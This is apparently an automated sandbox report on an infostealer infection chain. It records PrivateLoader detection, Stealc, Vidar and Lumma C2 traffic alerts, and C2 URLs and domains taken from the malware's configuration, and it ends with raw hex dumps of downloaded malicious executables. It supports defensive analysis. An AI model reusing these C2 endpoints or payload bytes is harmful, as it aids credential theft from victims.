Source:	Binary string: \??\C:\Windows\System.pdb u source: LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb@ source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 0000001E.00000002.2592999435.00000000387A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 0000001E.00000002.2586703649.000000002C8C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 0000000F.00000002.2358493205.000000006B49D000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe, 0000001E.00000002.2582659110.000000002695C000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.15.dr
Source:	Binary string: \mscorlib.pdb source: LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: LKMService.exe, 00000006.00000002.2006855231.00000000009EB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: RegAsm.exe, 0000001E.00000002.2578465808.00000000209E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb& source: LKMService.exe, 00000006.00000002.2006855231.00000000009AD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Wws\mscorlib.pdb source: LKMService.exe, 00000011.00000002.1976390085.0000000000738000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000006.00000002.2006855231.00000000009EB000.00000004.00000020.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ystem.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: LKMService.exe, 00000011.00000002.1976790281.000000000098E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: LKMService.exe, 00000011.00000002.1976790281.0000000000956000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: $ws\mscorlib.pdba source: LKMService.exe, 00000006.00000002.2005439577.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: RegAsm.exe, 0000000F.00000002.2367713660.000000006B65F000.00000002.00000001.01000000.0000000F.sdmp, RegAsm.exe, 0000001E.00000002.2602099949.000000003E712000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000010.00000002.2763255902.000000002256B000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2577257374.0000000020588000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2556369428.000000001A612000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3114645633.00000000200DB000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2947741085.000000002263B000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: RegAsm.exe, 0000001E.00000002.2590145393.0000000032837000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: LKMService.exe, 00000006.00000002.2016752958.0000000002611000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000011.00000002.1977952674.0000000002851000.00000004.00000800.00020000.00000000.sdmp

Spreading

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7856, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0053FAB6 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,	5_2_0053FAB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	15_2_0040E430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	15_2_00414910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	15_2_0040BE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	15_2_004016D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	15_2_0040DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	15_2_00413EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	15_2_0040F6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,	15_2_004138B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	15_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	15_2_0040ED20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	15_2_0040DE10

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49749 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49749 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49749 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49749 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:49811 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49809 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49809 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 46.8.231.109:80 -> 192.168.2.4:49809
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49809 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 46.8.231.109:80 -> 192.168.2.4:49809
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49809 -> 46.8.231.109:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49767 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49767 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49760 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49760 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49762 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49771 -> 49.12.197.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49772 -> 172.67.195.67:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49765 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49765 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49771
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49772 -> 172.67.195.67:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49769 -> 104.21.18.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49769 -> 104.21.18.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49777 -> 104.21.16.12:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49777 -> 104.21.16.12:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49774 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49774 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49804 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49804 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49813 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49802 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49813 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49802 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49817 -> 104.21.16.12:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49817 -> 104.21.16.12:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49822
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49823
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49806 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49806 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49812 -> 172.67.195.67:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49812 -> 172.67.195.67:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49807 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49807 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49836 -> 172.67.195.67:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49836 -> 172.67.195.67:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49834 -> 104.21.18.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 104.21.18.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49838 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49841 -> 104.21.16.12:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49841 -> 104.21.16.12:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49838 -> 104.21.17.174:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49849
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49852
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49832 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49832 -> 104.21.84.18:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.197.9:443 -> 192.168.2.4:49870
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.197.9:443 -> 192.168.2.4:49867
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49831 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49831 -> 104.21.56.150:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49810 -> 104.21.18.193:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49810 -> 104.21.18.193:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49827 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 172.67.208.141:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49829 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49829 -> 188.114.96.3:443

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7856, type: MEMORYSTR

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://46.8.231.109/c4754d4f680ead72.php
Source: Malware configuration extractor	URLs: treatynreit.site
Source: Malware configuration extractor	URLs: mysterisop.site
Source: Malware configuration extractor	URLs: absorptioniw.site
Source: Malware configuration extractor	URLs: chorusarorp.site
Source: Malware configuration extractor	URLs: snarlypagowo.site
Source: Malware configuration extractor	URLs: abnomalrkmu.site
Source: Malware configuration extractor	URLs: questionsmw.stor
Source: Malware configuration extractor	URLs: soldiefieop.site
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:41:03 GMTContent-Type: application/octet-streamContent-Length: 1964072Last-Modified: Mon, 30 Sep 2024 22:24:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fb252f-1df828"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 87 24 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c8 1d 00 00 08 00 00 00 00 00 00 3e e6 1d 00 00 20 00 00 00 00 1e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 1e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec e5 1d 00 4f 00 00 00 00 00 1e 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 d2 1d 00 28 26 00 00 00 20 1e 00 0c 00 00 00 b4 e4 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 c6 1d 00 00 20 00 00 00 c8 1d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 00 1e 00 00 06 00 00 00 ca 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 1e 00 00 02 00 00 00 d0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 e6 1d 00 00 00 00 00 48 00 00 00 02 00 05 00 20 d3 1d 00 94 11 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 77 db 4b db 0d 86 8a ff 21 aa 90 f7 e4 f3 c0 22 68 88 c6 26 4e 4a 24 82 f0 6d aa 55 4f f2 c0 10 c9 a6 6a d8 53 91 f0 9b c1 a6 75 a7 0f eb 0d bf e9 d4 fb a1 59 46 03 e8 d5 7b 41 59 7f f8 76 fb 35 3a 23 49 c5 84 bc ea a0 35 18 ad 2c 4a e2 0b 37 2b 2e ba ab 3a 78 4a 26 f9 6d 29 2f 99 80 75 a4 d8 54 6a ec 3d 84 12 8a b1 cb 62 55 bc 16 2f 45 37 cf 94 1b ca a6 3f 19 8a 5f b7 47 5c c4 d3 ed d8 82 9b f8 7a a4 ae 12 ce 64 bb 7b 95 81 97 85 fc 19 24 43 3d 7c 9c 4e 65 f7 2c 4d 34 5f 86 3f 5e 39 65 db db 00 b5 19 40 98 95 ed c1 b7 46 64 38 fa c5 d6 cc bb 7f b7 1f 3a 02 d0 a4 9c b0 db cb c6 9e cd 93 9f d9 2d 5a 94 4e c5 c7 96 bf df a7 ce a3 b6 14 4a b2 2a bb 34 2a f9 48 d9 93 ce fe 90 07 99 44 1e 18 a1 5d b1 b5 30 b1 de 2b cf 1b ba 5b fd 68 6b 5a a6 d9 1f 4b 97 68 52 3c 32 44 43 1d fa 2b fd e0 ab 3d fd f6 7e 69 4e 59 2b ae 91 70 79 14 d7 af d3 a4 e7 ac 2c 35 97 12 62 25 0e ff 30 e3 96 ba c4 04 0a ef f5 98
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 02 Oct 2024 07:41:15 GMTContent-Type: application/octet-streamContent-Length: 423840Last-Modified: Tue, 01 Oct 2024 13:44:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fbfccd-677a0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 20 06 00 00 06 00 00 00 00 00 00 ee 3e 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 a1 95 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 3e 06 00 53 00 00 00 00 40 06 00 42 02 00 00 00 00 00 00 00 00 00 00 78 51 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 60 3d 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 1e 06 00 00 20 00 00 00 20 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 40 06 00 00 04 00 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 3e 06 00 00 00 00 00 48 00 00 00 02 00 05 00 40 2b 06 00 20 12 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 42 2c d1 93 c8 4a 65 ad 38 b7 18 2a c6 c0 85 02 b3 e5 ca 58 66 dc e9 33 f5 0c 5a 6d 97 10 f4 76 07 24 3a be 9f dc 72 84 b7 89 d0 ea 1f 58 f2 1e 82 4d be cd 36 27 34 b2 db b6 2c ab 4f 97 54 df 13 fc 21 b2 07 42 0c da bf 43 98 7c f4 98 0d 9b 5b 05 7b 32 ae 79 e2 92 81 64 3f 31 64 32 a6 6d b5 be 84 92 cf 08 fd 55 35 41 39 fb 33 f1 42 dd 5b 6c d7 74 a6 a7 50 33 66 c5 41 2a 90 79 fb 7a 24 fd 5b 59 69 7f 06 96 ca 88 08 ca e7 11 99 a0 c1 f5 f4 5b e1 e1 76 ea 11 5c b7 1a 42 71 a1 ef 67 11 5e e9 91 ee f9 02 88 70 64 92 93 db 8c c5 7b 04 9f b0 92 74 05 7d e5 79 2a b4 e8 af 5b 50 c8 04 dc 0a 76 07 79 1e 48 07 20 ac e5 40 e7 27 32 e8 5e ab f8 34 dc 68 be b8 37 21 d4 b6 4f 80 77 d5 bc 4a 78 b5 ab 1d 69 e3 9e a4 e8 1a ab 76 a8 14 de b5 3f a1 47 d7 a4 36 5e e7 f9 05 60 ff 71 38 da c2 4e 5a b5 ab 2d 97 54 9a bf 96 75 ef 9a d0 92 f2 57 31 7a 1e 8b a0 fc 01 4b c7 b6 81 5f 9c c1 90 2a ff 16 37 1b 2d cb 1b a1 4
